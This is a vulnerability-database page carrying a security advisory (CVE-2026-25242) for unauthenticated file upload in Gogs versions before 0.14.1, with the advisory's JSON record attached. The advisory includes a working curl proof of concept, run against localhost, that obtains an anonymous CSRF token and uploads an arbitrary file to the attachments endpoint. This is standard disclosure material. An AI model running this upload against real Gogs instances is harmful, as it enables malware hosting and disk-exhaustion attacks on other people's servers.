GHSA-FC3H-92P8-H36F

Vulnerability from github – Published: 2026-02-17 18:44 – Updated: 2026-02-19 21:23
VLAI?
Summary
Unauthenticated File Upload in Gogs
Details

Security Advisory:Unauthenticated File Upload in Gogs Vulnerability Type: Unauthenticated File Upload Date: Aug 5, 2025 Discoverer: OpenAI Security Research

Summary

Gogs exposes unauthenticated file upload endpoints by default. When the global RequireSigninView setting is disabled (default), any remote user can upload arbitrary files to the server via /releases/attachments and /issues/attachments. This enables the instance to be abused as a public file host, potentially leading to disk exhaustion, content hosting, or delivery of malware. CSRF tokens do not mitigate this attack due to same-origin cookie issuance.

Affected Versions

  • Software: Gogs
  • Confirmed Version(s): 28f83626d4ed0aa7b89493be2ea8b79ca038331e
  • Likely Affected: All versions since 2020-04-05 with unauthenticated attachments endpoints
  • Introduced Commit: 07818d5fa

Vulnerability Details

The web.go router exposes the following endpoints under the ignSignIn route group:

Vulnerable Code Snippet

m.Post("/issues/attachments", repo.UploadIssueAttachment)
m.Post("/releases/attachments", repo.UploadReleaseAttachment)

These endpoints are accessible by unauthenticated users if the configuration variable RequireSigninView is false (default). This allows arbitrary file uploads to data/attachments, returning a UUID in response.

While CSRF protection is enabled, attackers can obtain a valid token anonymously from the site and use it in the upload request without authentication.

Description

Anonymous file upload using only default configuration and a CSRF token obtained from the homepage.

POC

# Run Gogs docker 
docker start gogs

# Software will be run on http://localhost:10880/. Finish the setup with local Sqlite database

# Get CSRF cookie into a jar
curl -sS -c cookies.txt http://localhost:10880/ -o /dev/null

# Extract the _csrf value from the jar
CSRF="$(awk '$6=="_csrf"{print $7}' cookies.txt | tail -n1)"

# Upload the file, sending cookie jar + header
curl -sS \
  -b cookies.txt -c cookies.txt \
  -H "X-CSRF-Token: $CSRF" \
  -H "Referer: http://localhost:10880/" \
  -F "file=@image.png" \
  http://localhost:10880/issues/attachments

 => {"uuid":"<UUID>"}

The attachment will be available at: http://localhost:10880/attachments/

Impact

Unrestricted File Upload: Attackers can store arbitrary content on the server. Denial-of-Service: Repeated uploads can exhaust disk space. Malware Hosting: Gogs may inadvertently serve attacker-hosted payloads under its domain.

Realistic Exploitation Scenarios

  • Spammers or malicious actors use the Gogs instance to host phishing payloads or malware.
  • Attackers fill up disk with repeated uploads.
  • Attackers use hosted Gogs instances as public file dumps (e.g., for P2P, exfiltration)

Potential Impact

This unauthenticated upload vector effectively turns any Gogs instance into a file hosting platform open to the public. This is especially dangerous for production or Internet-exposed installations. The combination of no login requirement, wildcard MIME support, and unrestricted access to attachments enables both resource abuse and potential malware distribution.

Timeline

  • August 2025: Discovered via GPT5
  • August 2025: Reproduced and confirmed via PoC and sanitizer
  • Aug 6, 2025 - Sent to Gogs via https://github.com/gogs/gogs/security/advisories/new
Severity ?
6.9 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25242"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-17T18:44:07Z",
    "nvd_published_at": "2026-02-19T07:17:45Z",
    "severity": "MODERATE"
  },
  "details": "Security Advisory:Unauthenticated File Upload in Gogs\nVulnerability Type: Unauthenticated File Upload\nDate: Aug 5, 2025\nDiscoverer: OpenAI Security Research\n\n## Summary\nGogs exposes unauthenticated file upload endpoints by default. When the global RequireSigninView setting is disabled (default), any remote user can upload arbitrary files to the server via /releases/attachments and /issues/attachments. This enables the instance to be abused as a public file host, potentially leading to disk exhaustion, content hosting, or delivery of malware. CSRF tokens do not mitigate this attack due to same-origin cookie issuance.\n\n## Affected Versions\n\n- Software: [Gogs](https://github.com/gogs/gogs/tree/main)\n- Confirmed Version(s): 28f83626d4ed0aa7b89493be2ea8b79ca038331e\n- Likely Affected: All versions since 2020-04-05 with unauthenticated attachments endpoints\n- Introduced Commit: 07818d5fa\n\n## Vulnerability Details\nThe web.go router exposes the following endpoints under the ignSignIn route group:\n\n### Vulnerable Code Snippet\n```\nm.Post(\"/issues/attachments\", repo.UploadIssueAttachment)\nm.Post(\"/releases/attachments\", repo.UploadReleaseAttachment)\n```\nThese endpoints are accessible by unauthenticated users if the configuration variable RequireSigninView is false (default). This allows arbitrary file uploads to data/attachments, returning a UUID in response.\n\nWhile CSRF protection is enabled, attackers can obtain a valid token anonymously from the site and use it in the upload request without authentication.\n## Description\nAnonymous file upload using only default configuration and a CSRF token obtained from the homepage.\n## POC\n```\n# Run Gogs docker \ndocker start gogs\n\n# Software will be run on http://localhost:10880/. Finish the setup with local Sqlite database\n\n# Get CSRF cookie into a jar\ncurl -sS -c cookies.txt http://localhost:10880/ -o /dev/null\n\n# Extract the _csrf value from the jar\nCSRF=\"$(awk \u0027$6==\"_csrf\"{print $7}\u0027 cookies.txt | tail -n1)\"\n\n# Upload the file, sending cookie jar + header\ncurl -sS \\\n  -b cookies.txt -c cookies.txt \\\n  -H \"X-CSRF-Token: $CSRF\" \\\n  -H \"Referer: http://localhost:10880/\" \\\n  -F \"file=@image.png\" \\\n  http://localhost:10880/issues/attachments\n\n =\u003e {\"uuid\":\"\u003cUUID\u003e\"}\n```\nThe attachment will be available at: http://localhost:10880/attachments/\u003cuuid\u003e\n\n## Impact\n**Unrestricted File Upload:** Attackers can store arbitrary content on the server.\n**Denial-of-Service:** Repeated uploads can exhaust disk space.\n**Malware Hosting:** Gogs may inadvertently serve attacker-hosted payloads under its domain.\n\n## Realistic Exploitation Scenarios\n\n- Spammers or malicious actors use the Gogs instance to host phishing payloads or malware.\n- Attackers fill up disk with repeated uploads.\n- Attackers use hosted Gogs instances as public file dumps (e.g., for P2P, exfiltration)\n\n## Potential Impact\nThis unauthenticated upload vector effectively turns any Gogs instance into a file hosting platform open to the public. This is especially dangerous for production or Internet-exposed installations. The combination of no login requirement, wildcard MIME support, and unrestricted access to attachments enables both resource abuse and potential malware distribution.\n\n## Timeline\n\n- August 2025: Discovered via GPT5\n- August 2025: Reproduced and confirmed via PoC and sanitizer\n- Aug 6, 2025 - Sent to Gogs via https://github.com/gogs/gogs/security/advisories/new",
  "id": "GHSA-fc3h-92p8-h36f",
  "modified": "2026-02-19T21:23:40Z",
  "published": "2026-02-17T18:44:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-fc3h-92p8-h36f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25242"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8128"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/628216d5889fcb838c471f4754f09b935d9cd9f3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Unauthenticated File Upload in Gogs"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.